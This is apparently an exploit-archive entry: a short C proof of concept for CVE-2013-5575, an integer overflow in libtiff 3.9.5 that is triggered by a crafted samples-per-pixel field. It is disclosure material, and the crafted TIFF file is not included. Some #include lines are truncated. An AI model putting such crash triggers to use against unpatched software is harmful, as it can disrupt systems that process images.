/* # Exploit Title: libtiff <= 3.9.5 Integer overflow bug poc # Date: 2013/08/25 # Exploit Author: x90c # Vendor Homepage: http://www.remotesensing.org/libtiff # Version: - libtiff 3.9.5 <= # Tested on: - libtiff 4.0.3 - libtiff 4.0.2 - libtiff 4.0.1 - libtiff 4.0.0 (safe) - libtiff 3.9.5 (vulnerable) <= - libtiff 3.6.0 # CVE : CVE-2013-5575 I submit the poc of libtiff bug and attached original advisory too I want to submit the poc, sample file only http://www.x90c.org/advisories/xadv_2013001_libtiff.txt */ #include #include #include #include "tiffio.h" int tiff_integer_overflow_test(){ TIFF* tif = TIFFOpen("/home/x90c/sample_spp.tif", "r"); int samples = 0; /* * for instance, TIFFGetField library function will * called with malicious samplesperpixel field value * TIFFGetField got segfault! */ TIFFGetField(tif, TIFFTAG_SAMPLESPERPIXEL, &samples); printf("tiff_poc: tif samplesperpixel field=%d\n", samples); }